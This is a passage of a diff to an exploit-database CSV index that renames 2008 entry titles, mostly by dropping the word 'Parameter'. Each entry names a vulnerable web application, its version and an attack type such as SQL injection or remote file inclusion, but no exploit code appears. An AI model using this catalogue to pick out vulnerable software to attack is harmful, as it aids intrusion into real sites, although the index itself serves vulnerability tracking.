2.0.5 - 'day' Parameter SQL Injection",2008-01-14,nonroot,php,webapps,0 -4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - 'topic' Parameter SQL Injection",2008-01-14,j0j0,php,webapps,0 -4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - 'cat' Parameter SQL Injection",2008-01-14,JosS,asp,webapps,0 +4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,php,webapps,0 +4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - 'topic' SQL Injection",2008-01-14,j0j0,php,webapps,0 +4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - 'cat' SQL Injection",2008-01-14,JosS,asp,webapps,0 4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 - Remote Authentication Bypass",2008-01-15,ka0x,php,webapps,0 4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4919,platforms/php/webapps/4919.txt,"Blog:CMS 4.2.1b - SQL Injection / Cross-Site Scripting",2008-01-16,DSecRG,php,webapps,0 -4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 - 'page' Parameter Local File Inclusion",2008-01-16,DSecRG,php,webapps,0 +4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 - 'page' Local File Inclusion",2008-01-16,DSecRG,php,webapps,0 4921,platforms/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 - Remote File Disclosure",2008-01-16,-=M.o.B=-,asp,webapps,0 4922,platforms/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Blind SQL Injection",2008-01-16,Silentz,php,webapps,0 -4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - 'Search' Parameter SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 +4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 4926,platforms/php/webapps/4926.pl,"Gradman 0.1.3 - 'agregar_info.php' Local File Inclusion",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution",2008-01-16,Silentz,php,webapps,0 4928,platforms/php/webapps/4928.txt,"MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - 'id' SQL Injection",2008-01-17,Stack,php,webapps,0 -4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - 'language' Parameter Local File Inclusion",2008-01-17,Scary-Boys,php,webapps,0 +4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - 'language' Local File Inclusion",2008-01-17,Scary-Boys,php,webapps,0 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - 'stat.php' Remote Code Execution",2008-01-18,k1tk4t,php,webapps,0 4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - 'info.php' Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 -4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - 'cfile' Parameter Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 +4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - 'cfile' Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 -4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - 'language' Parameter Local File Inclusion",2008-01-20,shinmai,php,webapps,0 +4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - 'language' Local File Inclusion",2008-01-20,shinmai,php,webapps,0 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,php,webapps,0 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal",2008-01-20,Houssamix,php,webapps,0 -4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - 'IDFM' Parameter SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 +4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - 'IDFM' SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,php,webapps,0 4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,php,webapps,0 -4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' Parameter SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 +4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 4952,platforms/php/webapps/4952.txt,"BoastMachine 3.1 - 'mail.php' id SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - 'id' File Disclosure",2008-01-21,shinmai,php,webapps,0 -4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - 'Filename' Parameter File Disclosure",2008-01-21,MhZ91,php,webapps,0 -4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion",2008-01-21,QTRinux,php,webapps,0 +4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - 'Filename' File Disclosure",2008-01-21,MhZ91,php,webapps,0 +4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusions",2008-01-21,QTRinux,php,webapps,0 4956,platforms/php/webapps/4956.txt,"Alstrasoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - 'MOIND_ID' Cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 4958,platforms/php/webapps/4958.txt,"aflog 1.01 - Cross-Site Scripting / SQL Injection",2008-01-22,shinmai,php,webapps,0 -4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0 +4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' SQL Injection",2008-01-22,S@BUN,php,webapps,0 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 -4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0 -4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0 +4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0 +4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 -4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 +4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 -4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 -4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0 -4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0 +4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 +4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0 +4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Local File Inclusion",2008-01-23,Stack,php,webapps,0 4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0 -4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 +4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0 -4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0 +4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' SQL Injection",2008-01-25,Houssamix,php,webapps,0 4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0 -4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0 +4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusions",2008-01-26,Stack,php,webapps,0 4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0 4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0 -5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 -5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0 -5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0 -5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 -5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 -5007,platforms/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5008,platforms/php/webapps/5008.txt,"Mambo Component 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5009,platforms/php/webapps/5009.txt,"Mambo Component 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 +5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Remote File Disclosure",2008-01-28,Stack,php,webapps,0 +5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' SQL Injection",2008-01-29,D4m14n,php,webapps,0 +5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 +5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 +5007,platforms/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5008,platforms/php/webapps/5008.txt,"Mambo Component 'com_fq' - 'listid' SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5009,platforms/php/webapps/5009.txt,"Mambo Component 'com_mamml' - 'listid' SQL Injection",2008-01-29,S@BUN,php,webapps,0 5010,platforms/php/webapps/5010.txt,"Mambo Component 'com_glossary' 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - 'aid' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - 'template_path' Parameter Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 +5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - 'aid' SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - 'template_path' Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 5013,platforms/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - 'adclick.php' SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 -5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - 'id' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5015,platforms/php/webapps/5015.txt,"Mambo Component jokes 1.0 - 'cat' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - 'id' SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5015,platforms/php/webapps/5015.txt,"Mambo Component jokes 1.0 - 'cat' SQL Injection",2008-01-30,S@BUN,php,webapps,0 5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5017,platforms/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - 'to_date' Parameter SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 +5017,platforms/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - 'to_date' SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 5018,platforms/php/webapps/5018.pl,"ibProArcade 3.3.0 - SQL Injection",2008-01-30,RST/GHC,php,webapps,0 5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution",2008-01-30,waraxe,php,webapps,0 5020,platforms/php/webapps/5020.txt,"Joomla! Component ChronoForms 2.3.5 - Remote File Inclusion",2008-01-30,Crackers_Child,php,webapps,0 -5021,platforms/php/webapps/5021.txt,"PHP Links 1.3 - 'id' Parameter SQL Injection",2008-01-30,Houssamix,php,webapps,0 +5021,platforms/php/webapps/5021.txt,"PHP Links 1.3 - 'id' SQL Injection",2008-01-30,Houssamix,php,webapps,0 5022,platforms/php/webapps/5022.txt,"PHP Links 1.3 - 'smarty.php' Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 -5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion",2008-01-31,"David Wharton",php,webapps,0 +5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusions",2008-01-31,"David Wharton",php,webapps,0 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps,0 5029,platforms/php/webapps/5029.txt,"Mambo Component 'com_akogallery' 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5030,platforms/php/webapps/5030.txt,"Mambo Component 'com_catalogshop' 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 - 'cp_upload_image.php' Arbitrary File Upload",2008-02-01,Omni,php,webapps,0 -5034,platforms/php/webapps/5034.txt,"Joomla! Component NeoReferences 1.3.1 - 'catid' Parameter SQL Injection",2008-02-01,S@BUN,php,webapps,0 +5034,platforms/php/webapps/5034.txt,"Joomla! Component NeoReferences 1.3.1 - 'catid' SQL Injection",2008-02-01,S@BUN,php,webapps,0 5035,platforms/php/webapps/5035.txt,"WordPress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 5037,platforms/php/webapps/5037.txt,"The Everything Development System Pre-1.0 - SQL Injection",2008-02-02,sub,php,webapps,0 5039,platforms/php/webapps/5039.txt,"WordPress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,php,webapps,0 -5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - 'topicid' Parameter SQL Injection",2008-02-02,S@BUN,php,webapps,0 +5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - 'topicid' SQL Injection",2008-02-02,S@BUN,php,webapps,0 5041,platforms/php/webapps/5041.txt,"phpShop 0.8.1 - SQL Injection / Filter Bypass",2008-02-02,"the redc0ders",php,webapps,0 -5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - 'id' Parameter Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps,0 -5047,platforms/php/webapps/5047.txt,"Joomla! Component mosDirectory 2.3.2 - 'catid' Parameter SQL Injection",2008-02-03,GoLd_M,php,webapps,0 +5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps,0 +5047,platforms/php/webapps/5047.txt,"Joomla! Component mosDirectory 2.3.2 - 'catid' SQL Injection",2008-02-03,GoLd_M,php,webapps,0 5050,platforms/php/webapps/5050.pl,"A-Blog 2.0 - Cross-Site Scripting / SQL Injection",2008-02-03,"Khashayar Fereidani",php,webapps,0 5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 5055,platforms/php/webapps/5055.txt,"Joomla! Component com_Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 -5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - 'item_id' Parameter SQL Injection",2008-02-04,QTRinux,php,webapps,0 +5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - 'item_id' SQL Injection",2008-02-04,QTRinux,php,webapps,0 5057,platforms/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting",2008-02-04,DSecRG,php,webapps,0 -5058,platforms/php/webapps/5058.txt,"Mambo Component 'com_awesom' 0.3.2 - 'listid' Parameter SQL Injection",2008-02-04,S@BUN,php,webapps,0 -5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - 'itemID' Parameter SQL Injection",2008-02-04,S@BUN,php,webapps,0 +5058,platforms/php/webapps/5058.txt,"Mambo Component 'com_awesom' 0.3.2 - 'listid' SQL Injection",2008-02-04,S@BUN,php,webapps,0 +5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - 'itemID' SQL Injection",2008-02-04,S@BUN,php,webapps,0 5060,platforms/php/webapps/5060.txt,"VHD Web Pack 2.0 - 'index.php' Local File Inclusion",2008-02-04,DSecRG,php,webapps,0 5061,platforms/php/webapps/5061.txt,"All Club CMS 0.0.1f - 'index.php' Local File Inclusion",2008-02-04,Trancek,php,webapps,0 -5062,platforms/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - 'id' Parameter SQL Injection",2008-02-05,you_kn0w,php,webapps,0 +5062,platforms/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - 'id' SQL Injection",2008-02-05,you_kn0w,php,webapps,0 5064,platforms/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,php,webapps,0 -5065,platforms/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - 'pic' Parameter SQL Injection",2008-02-05,you_kn0w,php,webapps,0 +5065,platforms/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - 'pic' SQL Injection",2008-02-05,you_kn0w,php,webapps,0 5066,platforms/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",php,webapps,0 -5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusion",2008-02-06,Trancek,php,webapps,0 +5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusions",2008-02-06,Trancek,php,webapps,0 5070,platforms/php/webapps/5070.pl,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (1)",2008-02-06,F,php,webapps,0 -5071,platforms/php/webapps/5071.txt,"Astanda Directory Project 1.2 - 'link_id' Parameter SQL Injection",2008-02-06,you_kn0w,php,webapps,0 +5071,platforms/php/webapps/5071.txt,"Astanda Directory Project 1.2 - 'link_id' SQL Injection",2008-02-06,you_kn0w,php,webapps,0 5072,platforms/php/webapps/5072.txt,"Joomla! Component Ynews 1.0.0 - 'id' SQL Injection",2008-02-06,Crackers_Child,php,webapps,0 5073,platforms/php/webapps/5073.txt,"Mambo Component com_downloads - SQL Injection",2008-02-06,S@BUN,php,webapps,0 -5074,platforms/php/webapps/5074.php,"Mihalism Multi Host Download - 'Username' Parameter Blind SQL Injection",2008-02-06,Moubik,php,webapps,0 +5074,platforms/php/webapps/5074.php,"Mihalism Multi Host Download - 'Username' Blind SQL Injection",2008-02-06,Moubik,php,webapps,0 5075,platforms/php/webapps/5075.txt,"osCommerce Addon Customer Testimonials 3.1 - SQL Injection",2008-02-07,"it's my",php,webapps,0 -5076,platforms/php/webapps/5076.txt,"Mambo Component Sermon 0.2 - 'gid' Parameter SQL Injection",2008-02-07,S@BUN,php,webapps,0 +5076,platforms/php/webapps/5076.txt,"Mambo Component Sermon 0.2 - 'gid' SQL Injection",2008-02-07,S@BUN,php,webapps,0 5080,platforms/php/webapps/5080.txt,"Joomla! Component com_doc - SQL Injection",2008-02-07,S@BUN,php,webapps,0 5081,platforms/php/webapps/5081.txt,"Joomla! Component com_noticias 1.0 - SQL Injection",2008-02-07,xcorpitx,php,webapps,0 5082,platforms/php/webapps/5082.txt,"PowerNews 2.5.6 - Local File Inclusion",2008-02-08,DSecRG,php,webapps,0 @@ -19168,71 +19169,71 @@ id,file,description,date,author,platform,type,port 5084,platforms/php/webapps/5084.txt,"Mambo Component com_gallery - SQL Injection",2008-02-08,S@BUN,php,webapps,0 5088,platforms/php/webapps/5088.py,"Limbo CMS 1.0.4.2 - 'Cuid' cookie Blind SQL Injection",2008-02-09,The:Paradox,php,webapps,0 5089,platforms/php/webapps/5089.txt,"DomPHP 0.82 - 'index.php' Local File Inclusion",2008-02-09,Houssamix,php,webapps,0 -5090,platforms/php/webapps/5090.pl,"Open-Realty 2.4.3 - 'last_module' Parameter Remote Code Execution",2008-02-09,Iron,php,webapps,0 -5091,platforms/php/webapps/5091.pl,"Journalness 4.1 - 'last_module' Parameter Remote Code Execution",2008-02-09,Iron,php,webapps,0 +5090,platforms/php/webapps/5090.pl,"Open-Realty 2.4.3 - 'last_module' Remote Code Execution",2008-02-09,Iron,php,webapps,0 +5091,platforms/php/webapps/5091.pl,"Journalness 4.1 - 'last_module' Remote Code Execution",2008-02-09,Iron,php,webapps,0 5094,platforms/php/webapps/5094.txt,"Mambo Component Comments 0.5.8.5g - SQL Injection",2008-02-09,CheebaHawk215,php,webapps,0 5095,platforms/php/webapps/5095.txt,"PK-Designs PKs Movie Database 3.0.3 - Cross-Site Scripting / SQL Injection",2008-02-10,Houssamix,php,webapps,0 -5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 - 'item_id' Parameter SQL Injection",2008-02-10,"SoSo H H",php,webapps,0 -5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 -5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 -5099,platforms/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' Parameters SQL Injection",2008-02-10,halkfild,php,webapps,0 -5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' Parameter SQL Injection",2008-02-12,NTOS-Team,php,webapps,0 +5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 - 'item_id' SQL Injection",2008-02-10,"SoSo H H",php,webapps,0 +5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 - 'last_module' Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 +5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 +5099,platforms/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' SQL Injection",2008-02-10,halkfild,php,webapps,0 +5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' SQL Injection",2008-02-12,NTOS-Team,php,webapps,0 5103,platforms/php/webapps/5103.txt,"Joomla! Component Rapid Recipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5104,platforms/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 -5109,platforms/php/webapps/5109.txt,"Joomla! Component xfaq 1.2 - 'aid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0 +5109,platforms/php/webapps/5109.txt,"Joomla! Component xfaq 1.2 - 'aid' SQL Injection",2008-02-13,S@BUN,php,webapps,0 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104/2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 -5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - 'ssid' Parameter SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 -5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 -5117,platforms/php/webapps/5117.txt,"Joomla! Component paxxgallery 0.2 - 'iid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0 -5118,platforms/php/webapps/5118.txt,"Joomla! Component MCQuiz 0.9 Final - 'tid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0 -5119,platforms/php/webapps/5119.txt,"Joomla! Component Quiz 0.81 - 'tid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0 +5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - 'ssid' SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 +5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusions",2008-02-14,muuratsalo,php,webapps,0 +5117,platforms/php/webapps/5117.txt,"Joomla! Component paxxgallery 0.2 - 'iid' SQL Injection",2008-02-14,S@BUN,php,webapps,0 +5118,platforms/php/webapps/5118.txt,"Joomla! Component MCQuiz 0.9 Final - 'tid' SQL Injection",2008-02-14,S@BUN,php,webapps,0 +5119,platforms/php/webapps/5119.txt,"Joomla! Component Quiz 0.81 - 'tid' SQL Injection",2008-02-14,S@BUN,php,webapps,0 5120,platforms/php/webapps/5120.pl,"Joomla! 